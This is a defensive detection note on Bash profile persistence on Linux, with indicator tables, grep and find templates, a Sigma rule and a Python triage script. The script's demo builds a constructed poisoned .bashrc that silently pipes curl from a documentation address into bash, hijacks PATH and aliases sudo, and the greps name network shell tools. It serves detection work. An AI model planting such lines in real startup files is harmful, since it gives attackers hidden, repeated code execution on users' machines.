This note documents detection patterns related to Bash Profile Persistence on Linux systems.
Direct Indicators
| Source | Grep Pattern / Artifact | Meaning | Forensic Value | Notes |
|---|---|---|---|---|
| Shell artifact | .bashrc modified | Interactive shell persistence | Critical | Most common user-shell persistence path. |
| Shell artifact | .profile modified | Login shell persistence | Critical | Executes on login. |
| Shell artifact | .bash_profile modified | Login persistence | Critical | Common in privileged accounts. |
| Shell history | echo command >> .bashrc | Manual persistence insertion | Critical | Direct attacker action. |
| Shell history | curl ... >> .bashrc | Payload persistence | Critical | Strong malicious signal. |
| Shell history | export PATH= | PATH hijack persistence | Critical | Common stealth method. |
| Shell history | alias sudo= | Command hijack | High | Operator trick / persistence. |
| Shell artifact | Hidden command in shell profile | Silent payload | Critical | Strong stealth indicator. |
| Shell artifact | Reverse shell in profile | Callback persistence | Critical | High severity. |
| File timestamps | Recent profile modification | Timeline anchor | Critical | Strong forensic truth. |
| auditd | Write to profile files | Process attribution | Critical | Best attribution if enabled. |
Indirect Indicators
| Indicator | What To Look For | Forensic Value | Notes |
|---|---|---|---|
| Profile modified after root shell | Persistence after escalation | Critical | Strong hostile sequence. |
| Profile plus hidden payload path | Linked persistence chain | Critical | Strong operator discipline. |
| Profile change then outbound connection | Callback persistence | Critical | Very strong signal. |
| PATH altered unexpectedly | Hijack possibility | Critical | Strong privilege abuse clue. |
| Alias added silently | Command interception | High | Subtle persistence. |
Common Tools
| Tool | Usage |
|---|---|
| echo | Append persistence command. |
| cat >> | Inject block into profile. |
| sed -i | Inline modification. |
Relevant Artifacts
| Artifact | Path / Command | Forensic Value | Notes |
|---|---|---|---|
| .bashrc | User shell persistence | Critical | Primary artifact. |
| .profile | Login persistence | Critical | Primary artifact. |
| .bash_profile | Login persistence | Critical | Common root target. |
| File timestamps | stat | Critical | Timeline truth. |
| Shell history | .bash_history | Critical | Modification evidence. |
MITRE ATT&CK References
- T1546 Event Triggered Execution
- T1546.004 Unix Shell Configuration Modification
Decision Tree
- Which profile changed?
- What command inserted?
- Does it trigger callback / payload?
- Which account affected?
- Was cleanup attempted?
Example Detection Templates
Grep
```bash
grep -RE "bashrc|bash_profile|profile" /home/*/.bash_history /root/.bash_history 2>/dev/null
```
Journalctl
```bash
journalctl --no-pager | grep -i bash
```
File Inspection
```bash
# Group the -name tests so -exec applies to all three startup files, not just the last one
find /home /root -maxdepth 2 \( -name ".bashrc" -o -name ".profile" -o -name ".bash_profile" \) -exec stat {} \; 2>/dev/null
# Word-bound "nc" so the pattern does not match every "sync" or "function" line
grep -RE "curl|wget|\bnc\b|ncat|bash -i|python" /home/*/.bashrc /home/*/.profile /root/.bashrc /root/.profile 2>/dev/null
```
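The file-inspection greps and the decision tree can be run as one scripted triage per account. The script below is an added example, not part of the original note or of any tool it references; the regexes, the `scan_profile` and `triage_home` helpers, and the sample home directory it builds (account `alice`, a constructed `.bashrc`, `.profile` and `.bash_history`, and the documentation address 203.0.113.10) are all assumptions made for the demo. It classifies each hit by indicator class, records the profile mtime as the timeline anchor, pulls history lines that wrote into a startup file, and flags possible cleanup when history shows such a write but the profile no longer holds a hit.

```python
"""Triage Bash startup files along the note's decision tree (added example)."""
import os
import re
import tempfile
from dataclasses import dataclass

PROFILE_NAMES = (".bashrc", ".profile", ".bash_profile")

# Indicator classes taken from the note's tables; the regexes are assumptions, tune per estate.
PATTERNS = {
    "payload_download": re.compile(r"\b(curl|wget)\b.*(\|\s*(ba)?sh\b|\s-o\s)"),
    "reverse_shell": re.compile(r"/dev/tcp/|\bbash\s+-i\b|\bnc(at)?\b.*\s-e\s|\bsocket\.socket\b"),
    "path_hijack": re.compile(r"^\s*export\s+PATH=(?![\"']?\$PATH)"),  # prepends ahead of $PATH
    "alias_hijack": re.compile(r"^\s*alias\s+(sudo|su|ssh|ls|cd)="),
    "silenced_exec": re.compile(r"base64\s+(-d|--decode)|>\s*/dev/null\s+2>&1\s*&\s*$"),
}
CALLBACK_CLASSES = {"payload_download", "reverse_shell"}
# History lines that write into a startup file (manual insertion, tee -a, sed -i).
HISTORY_WRITE = re.compile(r"(>>|\bsed\s+-i\b|\btee\s+-a\b).*\.(bashrc|profile|bash_profile)\b")


@dataclass
class Finding:
    account: str
    path: str
    line_no: int
    category: str
    text: str
    callback: bool  # "does it trigger callback / payload?"


def scan_profile(path, account):
    """Return one Finding per (line, indicator class) match in a startup file."""
    findings = []
    with open(path, errors="replace") as fh:
        for no, raw in enumerate(fh, 1):
            line = raw.rstrip("\n")
            if not line.strip() or line.lstrip().startswith("#"):
                continue  # comments never execute
            for category, rx in PATTERNS.items():
                if rx.search(line):
                    findings.append(Finding(account, path, no, category, line,
                                            category in CALLBACK_CLASSES))
    return findings


def triage_home(home):
    """Apply the decision tree to one account's home directory (hypothetical helper)."""
    account = os.path.basename(os.path.normpath(home))
    report = {"account": account, "profiles": {}, "findings": [],
              "history_writes": [], "possible_cleanup": False}
    for name in PROFILE_NAMES:
        path = os.path.join(home, name)
        if os.path.isfile(path):
            report["profiles"][name] = os.stat(path).st_mtime  # timeline anchor
            report["findings"].extend(scan_profile(path, account))
    hist = os.path.join(home, ".bash_history")
    if os.path.isfile(hist):
        with open(hist, errors="replace") as fh:
            report["history_writes"] = [l.rstrip("\n") for l in fh if HISTORY_WRITE.search(l)]
    # Cleanup heuristic: history shows a write into a profile, but no profile holds a hit any more.
    report["possible_cleanup"] = bool(report["history_writes"]) and not report["findings"]
    return report


def build_demo():
    """Constructed fixture (not real evidence): a poisoned .bashrc plus telling history."""
    home = os.path.join(tempfile.mkdtemp(), "alice")
    os.makedirs(home)
    with open(os.path.join(home, ".bashrc"), "w") as fh:
        fh.write("# ~/.bashrc\n"
                 "alias ll='ls -la'\n"
                 "export PATH=$HOME/.cache/.x:$PATH\n"
                 "alias sudo='/tmp/.s/sudo'\n"
                 "curl -s http://203.0.113.10/i | bash >/dev/null 2>&1 &\n")
    with open(os.path.join(home, ".profile"), "w") as fh:
        fh.write("[ -f ~/.bashrc ] && . ~/.bashrc\n")
    with open(os.path.join(home, ".bash_history"), "w") as fh:
        fh.write("ls\necho 'curl -s http://203.0.113.10/i | bash' >> ~/.bashrc\nhistory -c\n")
    return home


if __name__ == "__main__":
    rep = triage_home(build_demo())
    for f in rep["findings"]:
        print(f"[{f.category}] {f.account} {f.path}:{f.line_no} callback={f.callback} :: {f.text}")
    print("history writes:", rep["history_writes"])
    print("possible cleanup:", rep["possible_cleanup"])
```

On a live host call `triage_home` for each directory under `/home` and for `/root`; treat the PATH and alias classes as leads rather than verdicts, since legitimate dotfiles also prepend to PATH, and confirm any hit against `stat` and auditd records before acting on it.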
Sigma
```yaml
title: Linux Bash Profile Persistence
id: linux-bash-profile-persistence
status: experimental
description: Detects suspicious shell profile modification used for persistence
logsource:
  product: linux
detection:
  selection_keywords:
    message|contains:
      - '.bashrc'
      - '.profile'
      - '.bash_profile'
  condition: selection_keywords
level: high
tags:
  - attack.persistence
  - attack.t1546.004
```
Mitigation & Hardening
| Control Area | Mitigation | Effectiveness | Notes |
|---|---|---|---|
| Profile review | Baseline shell startup files | Critical | Detect rogue inserts. |
| Auditd | Track profile writes | High | Strong attribution. |
| Least privilege | Restrict shell write abuse | High | Reduces persistence paths. |